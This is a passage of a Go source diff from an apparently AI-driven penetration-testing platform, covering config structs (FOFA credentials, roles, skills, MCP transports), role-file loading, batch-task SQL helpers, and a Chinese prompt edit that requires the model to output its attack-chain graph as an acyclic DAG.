||||
logger.Info("增量索引完成", zap.Int("totalItems", len(itemsToIndex)))
|
||||
logger.Info("增量索引完成", zap.Int("totalItems", len(itemsToIndex)), zap.Int("failedCount", failedCount))
|
||||
} else {
|
||||
logger.Info("检测到已有知识库索引,没有需要索引的新项或更新项")
|
||||
}
|
||||
|
||||
@@ -0,0 +1,40 @@
|
||||
package app
|
||||
|
||||
import (
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/skills"
|
||||
)
|
||||
|
||||
// skillStatsDBAdapter 将database.DB适配为skills.SkillStatsStorage接口
|
||||
type skillStatsDBAdapter struct {
|
||||
db *database.DB
|
||||
}
|
||||
|
||||
// UpdateSkillStats 更新Skills统计信息
|
||||
func (a *skillStatsDBAdapter) UpdateSkillStats(skillName string, totalCalls, successCalls, failedCalls int, lastCallTime *time.Time) error {
|
||||
return a.db.UpdateSkillStats(skillName, totalCalls, successCalls, failedCalls, lastCallTime)
|
||||
}
|
||||
|
||||
// LoadSkillStats 加载所有Skills统计信息
|
||||
func (a *skillStatsDBAdapter) LoadSkillStats() (map[string]*skills.SkillStats, error) {
|
||||
dbStats, err := a.db.LoadSkillStats()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// 转换为skills.SkillStats格式
|
||||
result := make(map[string]*skills.SkillStats)
|
||||
for name, stat := range dbStats {
|
||||
result[name] = &skills.SkillStats{
|
||||
SkillName: stat.SkillName,
|
||||
TotalCalls: stat.TotalCalls,
|
||||
SuccessCalls: stat.SuccessCalls,
|
||||
FailedCalls: stat.FailedCalls,
|
||||
LastCallTime: stat.LastCallTime,
|
||||
}
|
||||
}
|
||||
|
||||
return result, nil
|
||||
}
|
||||
@@ -466,14 +466,21 @@ func (b *Builder) buildSimplePrompt(reactInput, modelOutput string) string {
|
||||
- **权重5-7**:强关联(如发现漏洞、关键信息泄露)
|
||||
- **权重8-10**:极强关联(如漏洞利用成功、权限提升)
|
||||
|
||||
### DAG结构要求(树状图)
|
||||
- 所有边的source节点id必须小于target节点id(确保无环)
|
||||
- 节点id从"node_1"开始递增
|
||||
- 确保无孤立节点(每个节点至少有一条边连接)
|
||||
- **树状结构要求**:
|
||||
* 一个节点可以有多个后续节点(分支),例如:端口扫描节点可以同时连接到"Web服务识别"、"FTP服务识别"、"SSH服务识别"等多个节点
|
||||
* 多个节点可以汇聚到一个节点(汇聚),例如:多个不同的测试都指向同一个漏洞节点
|
||||
* 避免将所有节点连成一条线,应该根据实际的并行测试和分支探索构建树状结构
|
||||
### DAG结构要求(有向无环图)
|
||||
**关键:必须确保生成的是真正的DAG(有向无环图),不能有任何循环。**
|
||||
|
||||
- **节点编号规则**:节点id从"node_1"开始递增(node_1, node_2, node_3...)
|
||||
- **边的方向规则**:所有边的source节点id必须严格小于target节点id(source < target),这是确保无环的关键
|
||||
* 例如:node_1 → node_2 ✓(正确)
|
||||
* 例如:node_2 → node_1 ✗(错误,会形成环)
|
||||
* 例如:node_3 → node_5 ✓(正确)
|
||||
- **无环验证**:在输出JSON前,必须检查所有边,确保没有任何一条边的source >= target
|
||||
- **无孤立节点**:确保每个节点至少有一条边连接(除了可能的根节点)
|
||||
- **DAG结构特点**:
|
||||
* 一个节点可以有多个后续节点(分支),例如:node_2(端口扫描)可以同时连接到node_3、node_4、node_5等多个节点
|
||||
* 多个节点可以汇聚到一个节点(汇聚),例如:node_3、node_4、node_5都指向node_6(漏洞节点)
|
||||
* 避免将所有节点连成一条线,应该根据实际的并行测试和分支探索构建DAG结构
|
||||
- **拓扑排序验证**:如果按照节点id从小到大排序,所有边都应该从左指向右(从上指向下),这样就能保证无环
|
||||
|
||||
## 攻击链逻辑连贯性要求
|
||||
|
||||
@@ -609,13 +616,15 @@ func (b *Builder) buildSimplePrompt(reactInput, modelOutput string) string {
|
||||
## 重要提醒
|
||||
|
||||
1. **严禁杜撰**:只使用ReAct输入中实际执行的工具和实际返回的结果。如无实际数据,返回空的nodes和edges数组。
|
||||
2. **树状结构优先**:必须构建树状结构,而不是线性链。一个节点可以有多个后续节点(分支),多个节点可以指向同一个节点(汇聚)。避免将所有节点连成一条线。
|
||||
3. **完整性优先**:必须包含所有有意义的工具执行和关键步骤,不要为了控制节点数量而删除重要节点。攻击链必须能够完整展现从目标识别到漏洞发现的完整过程。
|
||||
4. **逻辑连贯**:确保攻击链能够讲述一个完整、连贯的渗透测试故事,包括所有关键步骤和决策点。
|
||||
5. **教育价值**:优先保留有教育意义的节点,帮助学习者理解渗透测试思维和完整流程。
|
||||
6. **准确性**:所有节点信息必须基于实际数据,不要推测或假设。
|
||||
7. **完整性检查**:确保每个节点都有必要的metadata字段,每条边都有正确的source和target,没有孤立节点。
|
||||
8. **不要过度精简**:如果实际执行步骤较多,可以适当增加节点数量(最多20个),确保不遗漏关键步骤。
|
||||
2. **DAG结构必须**:必须构建真正的DAG(有向无环图),不能有任何循环。所有边的source节点id必须严格小于target节点id(source < target)。
|
||||
3. **拓扑顺序**:节点应该按照逻辑顺序编号,target节点通常是node_1,后续的action节点按执行顺序递增,vulnerability节点在最后。
|
||||
4. **完整性优先**:必须包含所有有意义的工具执行和关键步骤,不要为了控制节点数量而删除重要节点。攻击链必须能够完整展现从目标识别到漏洞发现的完整过程。
|
||||
5. **逻辑连贯**:确保攻击链能够讲述一个完整、连贯的渗透测试故事,包括所有关键步骤和决策点。
|
||||
6. **教育价值**:优先保留有教育意义的节点,帮助学习者理解渗透测试思维和完整流程。
|
||||
7. **准确性**:所有节点信息必须基于实际数据,不要推测或假设。
|
||||
8. **完整性检查**:确保每个节点都有必要的metadata字段,每条边都有正确的source和target,没有孤立节点,没有循环。
|
||||
9. **不要过度精简**:如果实际执行步骤较多,可以适当增加节点数量(最多20个),确保不遗漏关键步骤。
|
||||
10. **输出前验证**:在输出JSON前,必须验证所有边都满足source < target的条件,确保DAG结构正确。
|
||||
|
||||
现在开始分析并构建攻击链:`, reactInput, modelOutput)
|
||||
}
|
||||
|
||||
@@ -6,22 +6,28 @@ import (
|
||||
"fmt"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strconv"
|
||||
"strings"
|
||||
|
||||
"gopkg.in/yaml.v3"
|
||||
)
|
||||
|
||||
type Config struct {
|
||||
Server ServerConfig `yaml:"server"`
|
||||
Log LogConfig `yaml:"log"`
|
||||
MCP MCPConfig `yaml:"mcp"`
|
||||
OpenAI OpenAIConfig `yaml:"openai"`
|
||||
Agent AgentConfig `yaml:"agent"`
|
||||
Security SecurityConfig `yaml:"security"`
|
||||
Database DatabaseConfig `yaml:"database"`
|
||||
Auth AuthConfig `yaml:"auth"`
|
||||
ExternalMCP ExternalMCPConfig `yaml:"external_mcp,omitempty"`
|
||||
Knowledge KnowledgeConfig `yaml:"knowledge,omitempty"`
|
||||
Version string `yaml:"version,omitempty" json:"version,omitempty"` // 前端显示的版本号,如 v1.3.3
|
||||
Server ServerConfig `yaml:"server"`
|
||||
Log LogConfig `yaml:"log"`
|
||||
MCP MCPConfig `yaml:"mcp"`
|
||||
OpenAI OpenAIConfig `yaml:"openai"`
|
||||
FOFA FofaConfig `yaml:"fofa,omitempty" json:"fofa,omitempty"`
|
||||
Agent AgentConfig `yaml:"agent"`
|
||||
Security SecurityConfig `yaml:"security"`
|
||||
Database DatabaseConfig `yaml:"database"`
|
||||
Auth AuthConfig `yaml:"auth"`
|
||||
ExternalMCP ExternalMCPConfig `yaml:"external_mcp,omitempty"`
|
||||
Knowledge KnowledgeConfig `yaml:"knowledge,omitempty"`
|
||||
RolesDir string `yaml:"roles_dir,omitempty" json:"roles_dir,omitempty"` // 角色配置文件目录(新方式)
|
||||
Roles map[string]RoleConfig `yaml:"roles,omitempty" json:"roles,omitempty"` // 向后兼容:支持在主配置文件中定义角色
|
||||
SkillsDir string `yaml:"skills_dir,omitempty" json:"skills_dir,omitempty"` // Skills配置文件目录
|
||||
}
|
||||
|
||||
type ServerConfig struct {
|
||||
@@ -47,9 +53,17 @@ type OpenAIConfig struct {
|
||||
MaxTotalTokens int `yaml:"max_total_tokens,omitempty" json:"max_total_tokens,omitempty"`
|
||||
}
|
||||
|
||||
type FofaConfig struct {
|
||||
// Email 为 FOFA 账号邮箱;APIKey 为 FOFA API Key(建议使用只读权限的 Key)
|
||||
Email string `yaml:"email,omitempty" json:"email,omitempty"`
|
||||
APIKey string `yaml:"api_key,omitempty" json:"api_key,omitempty"`
|
||||
BaseURL string `yaml:"base_url,omitempty" json:"base_url,omitempty"` // 默认 https://fofa.info/api/v1/search/all
|
||||
}
|
||||
|
||||
type SecurityConfig struct {
|
||||
Tools []ToolConfig `yaml:"tools,omitempty"` // 向后兼容:支持在主配置文件中定义工具
|
||||
ToolsDir string `yaml:"tools_dir,omitempty"` // 工具配置文件目录(新方式)
|
||||
Tools []ToolConfig `yaml:"tools,omitempty"` // 向后兼容:支持在主配置文件中定义工具
|
||||
ToolsDir string `yaml:"tools_dir,omitempty"` // 工具配置文件目录(新方式)
|
||||
ToolDescriptionMode string `yaml:"tool_description_mode,omitempty"` // 工具描述模式: "short" | "full",默认 short
|
||||
}
|
||||
|
||||
type DatabaseConfig struct {
|
||||
@@ -79,12 +93,14 @@ type ExternalMCPConfig struct {
|
||||
// ExternalMCPServerConfig 外部MCP服务器配置
|
||||
type ExternalMCPServerConfig struct {
|
||||
// stdio模式配置
|
||||
Command string `yaml:"command,omitempty" json:"command,omitempty"`
|
||||
Args []string `yaml:"args,omitempty" json:"args,omitempty"`
|
||||
Command string `yaml:"command,omitempty" json:"command,omitempty"`
|
||||
Args []string `yaml:"args,omitempty" json:"args,omitempty"`
|
||||
Env map[string]string `yaml:"env,omitempty" json:"env,omitempty"` // 环境变量(用于stdio模式)
|
||||
|
||||
// HTTP模式配置
|
||||
Transport string `yaml:"transport,omitempty" json:"transport,omitempty"` // "http" 或 "stdio"
|
||||
URL string `yaml:"url,omitempty" json:"url,omitempty"`
|
||||
Transport string `yaml:"transport,omitempty" json:"transport,omitempty"` // "stdio" | "sse" | "http"(Streamable) | "simple_http"(自建/简单POST端点,如本机 http://127.0.0.1:8081/mcp)
|
||||
URL string `yaml:"url,omitempty" json:"url,omitempty"`
|
||||
Headers map[string]string `yaml:"headers,omitempty" json:"headers,omitempty"` // HTTP/SSE 请求头(如 x-api-key)
|
||||
|
||||
// 通用配置
|
||||
Description string `yaml:"description,omitempty" json:"description,omitempty"`
|
||||
@@ -103,8 +119,8 @@ type ToolConfig struct {
|
||||
ShortDescription string `yaml:"short_description,omitempty"` // 简短描述(用于工具列表,减少token消耗)
|
||||
Description string `yaml:"description"` // 详细描述(用于工具文档)
|
||||
Enabled bool `yaml:"enabled"`
|
||||
Parameters []ParameterConfig `yaml:"parameters,omitempty"` // 参数定义(可选)
|
||||
ArgMapping string `yaml:"arg_mapping,omitempty"` // 参数映射方式: "auto", "manual", "template"(可选)
|
||||
Parameters []ParameterConfig `yaml:"parameters,omitempty"` // 参数定义(可选)
|
||||
ArgMapping string `yaml:"arg_mapping,omitempty"` // 参数映射方式: "auto", "manual", "template"(可选)
|
||||
AllowedExitCodes []int `yaml:"allowed_exit_codes,omitempty"` // 允许的退出码列表(某些工具在成功时也返回非零退出码)
|
||||
}
|
||||
|
||||
@@ -206,6 +222,29 @@ func Load(path string) (*Config, error) {
|
||||
}
|
||||
}
|
||||
|
||||
// 从角色目录加载角色配置
|
||||
if cfg.RolesDir != "" {
|
||||
configDir := filepath.Dir(path)
|
||||
rolesDir := cfg.RolesDir
|
||||
|
||||
// 如果是相对路径,相对于配置文件所在目录
|
||||
if !filepath.IsAbs(rolesDir) {
|
||||
rolesDir = filepath.Join(configDir, rolesDir)
|
||||
}
|
||||
|
||||
roles, err := LoadRolesFromDir(rolesDir)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("从角色目录加载角色配置失败: %w", err)
|
||||
}
|
||||
|
||||
cfg.Roles = roles
|
||||
} else {
|
||||
// 如果未配置 roles_dir,初始化为空 map
|
||||
if cfg.Roles == nil {
|
||||
cfg.Roles = make(map[string]RoleConfig)
|
||||
}
|
||||
}
|
||||
|
||||
return &cfg, nil
|
||||
}
|
||||
|
||||
@@ -374,6 +413,98 @@ func LoadToolFromFile(path string) (*ToolConfig, error) {
|
||||
return &tool, nil
|
||||
}
|
||||
|
||||
// LoadRolesFromDir 从目录加载所有角色配置文件
|
||||
func LoadRolesFromDir(dir string) (map[string]RoleConfig, error) {
|
||||
roles := make(map[string]RoleConfig)
|
||||
|
||||
// 检查目录是否存在
|
||||
if _, err := os.Stat(dir); os.IsNotExist(err) {
|
||||
return roles, nil // 目录不存在时返回空map,不报错
|
||||
}
|
||||
|
||||
// 读取目录中的所有 .yaml 和 .yml 文件
|
||||
entries, err := os.ReadDir(dir)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("读取角色目录失败: %w", err)
|
||||
}
|
||||
|
||||
for _, entry := range entries {
|
||||
if entry.IsDir() {
|
||||
continue
|
||||
}
|
||||
|
||||
name := entry.Name()
|
||||
if !strings.HasSuffix(name, ".yaml") && !strings.HasSuffix(name, ".yml") {
|
||||
continue
|
||||
}
|
||||
|
||||
filePath := filepath.Join(dir, name)
|
||||
role, err := LoadRoleFromFile(filePath)
|
||||
if err != nil {
|
||||
// 记录错误但继续加载其他文件
|
||||
fmt.Printf("警告: 加载角色配置文件 %s 失败: %v\n", filePath, err)
|
||||
continue
|
||||
}
|
||||
|
||||
// 使用角色名称作为key
|
||||
roleName := role.Name
|
||||
if roleName == "" {
|
||||
// 如果角色名称为空,使用文件名(去掉扩展名)作为名称
|
||||
roleName = strings.TrimSuffix(strings.TrimSuffix(name, ".yaml"), ".yml")
|
||||
role.Name = roleName
|
||||
}
|
||||
|
||||
roles[roleName] = *role
|
||||
}
|
||||
|
||||
return roles, nil
|
||||
}
|
||||
|
||||
// LoadRoleFromFile 从单个文件加载角色配置
|
||||
func LoadRoleFromFile(path string) (*RoleConfig, error) {
|
||||
data, err := os.ReadFile(path)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("读取文件失败: %w", err)
|
||||
}
|
||||
|
||||
var role RoleConfig
|
||||
if err := yaml.Unmarshal(data, &role); err != nil {
|
||||
return nil, fmt.Errorf("解析角色配置失败: %w", err)
|
||||
}
|
||||
|
||||
// 处理 icon 字段:如果包含 Unicode 转义格式(\U0001F3C6),转换为实际的 Unicode 字符
|
||||
// Go 的 yaml 库可能不会自动解析 \U 转义序列,需要手动转换
|
||||
if role.Icon != "" {
|
||||
icon := role.Icon
|
||||
// 去除可能的引号
|
||||
icon = strings.Trim(icon, `"`)
|
||||
|
||||
// 检查是否是 Unicode 转义格式 \U0001F3C6(8位十六进制)或 \uXXXX(4位十六进制)
|
||||
if len(icon) >= 3 && icon[0] == '\\' {
|
||||
if icon[1] == 'U' && len(icon) >= 10 {
|
||||
// \U0001F3C6 格式(8位十六进制)
|
||||
if codePoint, err := strconv.ParseInt(icon[2:10], 16, 32); err == nil {
|
||||
role.Icon = string(rune(codePoint))
|
||||
}
|
||||
} else if icon[1] == 'u' && len(icon) >= 6 {
|
||||
// \uXXXX 格式(4位十六进制)
|
||||
if codePoint, err := strconv.ParseInt(icon[2:6], 16, 32); err == nil {
|
||||
role.Icon = string(rune(codePoint))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 验证必需字段
|
||||
if role.Name == "" {
|
||||
// 如果名称为空,尝试从文件名获取
|
||||
baseName := filepath.Base(path)
|
||||
role.Name = strings.TrimSuffix(strings.TrimSuffix(baseName, ".yaml"), ".yml")
|
||||
}
|
||||
|
||||
return &role, nil
|
||||
}
|
||||
|
||||
func Default() *Config {
|
||||
return &Config{
|
||||
Server: ServerConfig{
|
||||
@@ -447,3 +578,21 @@ type RetrievalConfig struct {
|
||||
SimilarityThreshold float64 `yaml:"similarity_threshold" json:"similarity_threshold"` // 相似度阈值
|
||||
HybridWeight float64 `yaml:"hybrid_weight" json:"hybrid_weight"` // 向量检索权重(0-1)
|
||||
}
|
||||
|
||||
// RolesConfig 角色配置(已废弃,使用 map[string]RoleConfig 替代)
|
||||
// 保留此类型以兼容旧代码,但建议直接使用 map[string]RoleConfig
|
||||
type RolesConfig struct {
|
||||
Roles map[string]RoleConfig `yaml:"roles,omitempty" json:"roles,omitempty"`
|
||||
}
|
||||
|
||||
// RoleConfig 单个角色配置
|
||||
type RoleConfig struct {
|
||||
Name string `yaml:"name" json:"name"` // 角色名称
|
||||
Description string `yaml:"description" json:"description"` // 角色描述
|
||||
UserPrompt string `yaml:"user_prompt" json:"user_prompt"` // 用户提示词(追加到用户消息前)
|
||||
Icon string `yaml:"icon,omitempty" json:"icon,omitempty"` // 角色图标(可选)
|
||||
Tools []string `yaml:"tools,omitempty" json:"tools,omitempty"` // 关联的工具列表(toolKey格式,如 "toolName" 或 "mcpName::toolName")
|
||||
MCPs []string `yaml:"mcps,omitempty" json:"mcps,omitempty"` // 向后兼容:关联的MCP服务器列表(已废弃,使用tools替代)
|
||||
Skills []string `yaml:"skills,omitempty" json:"skills,omitempty"` // 关联的skills列表(skill名称列表,在执行任务前会读取这些skills的内容)
|
||||
Enabled bool `yaml:"enabled" json:"enabled"` // 是否启用
|
||||
}
|
||||
|
||||
@@ -0,0 +1,390 @@
|
||||
package database
|
||||
|
||||
import (
|
||||
"database/sql"
|
||||
"fmt"
|
||||
"time"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// BatchTaskQueueRow 批量任务队列数据库行
|
||||
type BatchTaskQueueRow struct {
|
||||
ID string
|
||||
Title sql.NullString
|
||||
Role sql.NullString
|
||||
Status string
|
||||
CreatedAt time.Time
|
||||
StartedAt sql.NullTime
|
||||
CompletedAt sql.NullTime
|
||||
CurrentIndex int
|
||||
}
|
||||
|
||||
// BatchTaskRow 批量任务数据库行
|
||||
type BatchTaskRow struct {
|
||||
ID string
|
||||
QueueID string
|
||||
Message string
|
||||
ConversationID sql.NullString
|
||||
Status string
|
||||
StartedAt sql.NullTime
|
||||
CompletedAt sql.NullTime
|
||||
Error sql.NullString
|
||||
Result sql.NullString
|
||||
}
|
||||
|
||||
// CreateBatchQueue 创建批量任务队列
|
||||
func (db *DB) CreateBatchQueue(queueID string, title string, role string, tasks []map[string]interface{}) error {
|
||||
tx, err := db.Begin()
|
||||
if err != nil {
|
||||
return fmt.Errorf("开始事务失败: %w", err)
|
||||
}
|
||||
defer tx.Rollback()
|
||||
|
||||
now := time.Now()
|
||||
_, err = tx.Exec(
|
||||
"INSERT INTO batch_task_queues (id, title, role, status, created_at, current_index) VALUES (?, ?, ?, ?, ?, ?)",
|
||||
queueID, title, role, "pending", now, 0,
|
||||
)
|
||||
if err != nil {
|
||||
return fmt.Errorf("创建批量任务队列失败: %w", err)
|
||||
}
|
||||
|
||||
// 插入任务
|
||||
for _, task := range tasks {
|
||||
taskID, ok := task["id"].(string)
|
||||
if !ok {
|
||||
continue
|
||||
}
|
||||
message, ok := task["message"].(string)
|
||||
if !ok {
|
||||
continue
|
||||
}
|
||||
|
||||
_, err = tx.Exec(
|
||||
"INSERT INTO batch_tasks (id, queue_id, message, status) VALUES (?, ?, ?, ?)",
|
||||
taskID, queueID, message, "pending",
|
||||
)
|
||||
if err != nil {
|
||||
return fmt.Errorf("创建批量任务失败: %w", err)
|
||||
}
|
||||
}
|
||||
|
||||
return tx.Commit()
|
||||
}
|
||||
|
||||
// GetBatchQueue 获取批量任务队列
|
||||
func (db *DB) GetBatchQueue(queueID string) (*BatchTaskQueueRow, error) {
|
||||
var row BatchTaskQueueRow
|
||||
var createdAt string
|
||||
err := db.QueryRow(
|
||||
"SELECT id, title, role, status, created_at, started_at, completed_at, current_index FROM batch_task_queues WHERE id = ?",
|
||||
queueID,
|
||||
).Scan(&row.ID, &row.Title, &row.Role, &row.Status, &createdAt, &row.StartedAt, &row.CompletedAt, &row.CurrentIndex)
|
||||
if err == sql.ErrNoRows {
|
||||
return nil, nil
|
||||
}
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("查询批量任务队列失败: %w", err)
|
||||
}
|
||||
|
||||
parsedTime, parseErr := time.Parse("2006-01-02 15:04:05", createdAt)
|
||||
if parseErr != nil {
|
||||
// 尝试其他时间格式
|
||||
parsedTime, parseErr = time.Parse(time.RFC3339, createdAt)
|
||||
if parseErr != nil {
|
||||
db.logger.Warn("解析创建时间失败", zap.String("createdAt", createdAt), zap.Error(parseErr))
|
||||
parsedTime = time.Now()
|
||||
}
|
||||
}
|
||||
row.CreatedAt = parsedTime
|
||||
return &row, nil
|
||||
}
|
||||
|
||||
// GetAllBatchQueues 获取所有批量任务队列
|
||||
func (db *DB) GetAllBatchQueues() ([]*BatchTaskQueueRow, error) {
|
||||
rows, err := db.Query(
|
||||
"SELECT id, title, role, status, created_at, started_at, completed_at, current_index FROM batch_task_queues ORDER BY created_at DESC",
|
||||
)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("查询批量任务队列列表失败: %w", err)
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
var queues []*BatchTaskQueueRow
|
||||
for rows.Next() {
|
||||
var row BatchTaskQueueRow
|
||||
var createdAt string
|
||||
if err := rows.Scan(&row.ID, &row.Title, &row.Role, &row.Status, &createdAt, &row.StartedAt, &row.CompletedAt, &row.CurrentIndex); err != nil {
|
||||
return nil, fmt.Errorf("扫描批量任务队列失败: %w", err)
|
||||
}
|
||||
parsedTime, parseErr := time.Parse("2006-01-02 15:04:05", createdAt)
|
||||
if parseErr != nil {
|
||||
parsedTime, parseErr = time.Parse(time.RFC3339, createdAt)
|
||||
if parseErr != nil {
|
||||
db.logger.Warn("解析创建时间失败", zap.String("createdAt", createdAt), zap.Error(parseErr))
|
||||
parsedTime = time.Now()
|
||||
}
|
||||
}
|
||||
row.CreatedAt = parsedTime
|
||||
queues = append(queues, &row)
|
||||
}
|
||||
|
||||
return queues, nil
|
||||
}
|
||||
|
||||
// ListBatchQueues 列出批量任务队列(支持筛选和分页)
|
||||
func (db *DB) ListBatchQueues(limit, offset int, status, keyword string) ([]*BatchTaskQueueRow, error) {
|
||||
query := "SELECT id, title, role, status, created_at, started_at, completed_at, current_index FROM batch_task_queues WHERE 1=1"
|
||||
args := []interface{}{}
|
||||
|
||||
// 状态筛选
|
||||
if status != "" && status != "all" {
|
||||
query += " AND status = ?"
|
||||
args = append(args, status)
|
||||
}
|
||||
|
||||
// 关键字搜索(搜索队列ID和标题)
|
||||
if keyword != "" {
|
||||
query += " AND (id LIKE ? OR title LIKE ?)"
|
||||
args = append(args, "%"+keyword+"%", "%"+keyword+"%")
|
||||
}
|
||||
|
||||
query += " ORDER BY created_at DESC LIMIT ? OFFSET ?"
|
||||
args = append(args, limit, offset)
|
||||
|
||||
rows, err := db.Query(query, args...)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("查询批量任务队列列表失败: %w", err)
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
var queues []*BatchTaskQueueRow
|
||||
for rows.Next() {
|
||||
var row BatchTaskQueueRow
|
||||
var createdAt string
|
||||
if err := rows.Scan(&row.ID, &row.Title, &row.Role, &row.Status, &createdAt, &row.StartedAt, &row.CompletedAt, &row.CurrentIndex); err != nil {
|
||||
return nil, fmt.Errorf("扫描批量任务队列失败: %w", err)
|
||||
}
|
||||
parsedTime, parseErr := time.Parse("2006-01-02 15:04:05", createdAt)
|
||||
if parseErr != nil {
|
||||
parsedTime, parseErr = time.Parse(time.RFC3339, createdAt)
|
||||
if parseErr != nil {
|
||||
db.logger.Warn("解析创建时间失败", zap.String("createdAt", createdAt), zap.Error(parseErr))
|
||||
parsedTime = time.Now()
|
||||
}
|
||||
}
|
||||
row.CreatedAt = parsedTime
|
||||
queues = append(queues, &row)
|
||||
}
|
||||
|
||||
return queues, nil
|
||||
}
|
||||
|
||||
// CountBatchQueues 统计批量任务队列总数(支持筛选条件)
|
||||
func (db *DB) CountBatchQueues(status, keyword string) (int, error) {
|
||||
query := "SELECT COUNT(*) FROM batch_task_queues WHERE 1=1"
|
||||
args := []interface{}{}
|
||||
|
||||
// 状态筛选
|
||||
if status != "" && status != "all" {
|
||||
query += " AND status = ?"
|
||||
args = append(args, status)
|
||||
}
|
||||
|
||||
// 关键字搜索(搜索队列ID和标题)
|
||||
if keyword != "" {
|
||||
query += " AND (id LIKE ? OR title LIKE ?)"
|
||||
args = append(args, "%"+keyword+"%", "%"+keyword+"%")
|
||||
}
|
||||
|
||||
var count int
|
||||
err := db.QueryRow(query, args...).Scan(&count)
|
||||
if err != nil {
|
||||
return 0, fmt.Errorf("统计批量任务队列总数失败: %w", err)
|
||||
}
|
||||
|
||||
return count, nil
|
||||
}
|
||||
|
||||
// GetBatchTasks 获取批量任务队列的所有任务
|
||||
func (db *DB) GetBatchTasks(queueID string) ([]*BatchTaskRow, error) {
|
||||
rows, err := db.Query(
|
||||
"SELECT id, queue_id, message, conversation_id, status, started_at, completed_at, error, result FROM batch_tasks WHERE queue_id = ? ORDER BY id",
|
||||
queueID,
|
||||
)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("查询批量任务失败: %w", err)
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
var tasks []*BatchTaskRow
|
||||
for rows.Next() {
|
||||
var task BatchTaskRow
|
||||
if err := rows.Scan(
|
||||
&task.ID, &task.QueueID, &task.Message, &task.ConversationID,
|
||||
&task.Status, &task.StartedAt, &task.CompletedAt, &task.Error, &task.Result,
|
||||
); err != nil {
|
||||
return nil, fmt.Errorf("扫描批量任务失败: %w", err)
|
||||
}
|
||||
tasks = append(tasks, &task)
|
||||
}
|
||||
|
||||
return tasks, nil
|
||||
}
|
||||
|
||||
// UpdateBatchQueueStatus 更新批量任务队列状态
|
||||
func (db *DB) UpdateBatchQueueStatus(queueID, status string) error {
|
||||
var err error
|
||||
now := time.Now()
|
||||
|
||||
if status == "running" {
|
||||
_, err = db.Exec(
|
||||
"UPDATE batch_task_queues SET status = ?, started_at = COALESCE(started_at, ?) WHERE id = ?",
|
||||
status, now, queueID,
|
||||
)
|
||||
} else if status == "completed" || status == "cancelled" {
|
||||
_, err = db.Exec(
|
||||
"UPDATE batch_task_queues SET status = ?, completed_at = COALESCE(completed_at, ?) WHERE id = ?",
|
||||
status, now, queueID,
|
||||
)
|
||||
} else {
|
||||
_, err = db.Exec(
|
||||
"UPDATE batch_task_queues SET status = ? WHERE id = ?",
|
||||
status, queueID,
|
||||
)
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
return fmt.Errorf("更新批量任务队列状态失败: %w", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// UpdateBatchTaskStatus 更新批量任务状态
|
||||
func (db *DB) UpdateBatchTaskStatus(queueID, taskID, status string, conversationID, result, errorMsg string) error {
|
||||
var err error
|
||||
now := time.Now()
|
||||
|
||||
// 构建更新语句
|
||||
var updates []string
|
||||
var args []interface{}
|
||||
|
||||
updates = append(updates, "status = ?")
|
||||
args = append(args, status)
|
||||
|
||||
if conversationID != "" {
|
||||
updates = append(updates, "conversation_id = ?")
|
||||
args = append(args, conversationID)
|
||||
}
|
||||
|
||||
if result != "" {
|
||||
updates = append(updates, "result = ?")
|
||||
args = append(args, result)
|
||||
}
|
||||
|
||||
if errorMsg != "" {
|
||||
updates = append(updates, "error = ?")
|
||||
args = append(args, errorMsg)
|
||||
}
|
||||
|
||||
if status == "running" {
|
||||
updates = append(updates, "started_at = COALESCE(started_at, ?)")
|
||||
args = append(args, now)
|
||||
}
|
||||
|
||||
if status == "completed" || status == "failed" || status == "cancelled" {
|
||||
updates = append(updates, "completed_at = COALESCE(completed_at, ?)")
|
||||
args = append(args, now)
|
||||
}
|
||||
|
||||
args = append(args, queueID, taskID)
|
||||
|
||||
// 构建SQL语句
|
||||
sql := "UPDATE batch_tasks SET "
|
||||
for i, update := range updates {
|
||||
if i > 0 {
|
||||
sql += ", "
|
||||
}
|
||||
sql += update
|
||||
}
|
||||
sql += " WHERE queue_id = ? AND id = ?"
|
||||
|
||||
_, err = db.Exec(sql, args...)
|
||||
if err != nil {
|
||||
return fmt.Errorf("更新批量任务状态失败: %w", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// UpdateBatchQueueCurrentIndex 更新批量任务队列的当前索引
|
||||
func (db *DB) UpdateBatchQueueCurrentIndex(queueID string, currentIndex int) error {
|
||||
_, err := db.Exec(
|
||||
"UPDATE batch_task_queues SET current_index = ? WHERE id = ?",
|
||||
currentIndex, queueID,
|
||||
)
|
||||
if err != nil {
|
||||
return fmt.Errorf("更新批量任务队列当前索引失败: %w", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// UpdateBatchTaskMessage 更新批量任务消息
|
||||
func (db *DB) UpdateBatchTaskMessage(queueID, taskID, message string) error {
|
||||
_, err := db.Exec(
|
||||
"UPDATE batch_tasks SET message = ? WHERE queue_id = ? AND id = ?",
|
||||
message, queueID, taskID,
|
||||
)
|
||||
if err != nil {
|
||||
return fmt.Errorf("更新批量任务消息失败: %w", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// AddBatchTask 添加任务到批量任务队列
|
||||
func (db *DB) AddBatchTask(queueID, taskID, message string) error {
|
||||
_, err := db.Exec(
|
||||
"INSERT INTO batch_tasks (id, queue_id, message, status) VALUES (?, ?, ?, ?)",
|
||||
taskID, queueID, message, "pending",
|
||||
)
|
||||
if err != nil {
|
||||
return fmt.Errorf("添加批量任务失败: %w", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// DeleteBatchTask 删除批量任务
|
||||
func (db *DB) DeleteBatchTask(queueID, taskID string) error {
|
||||
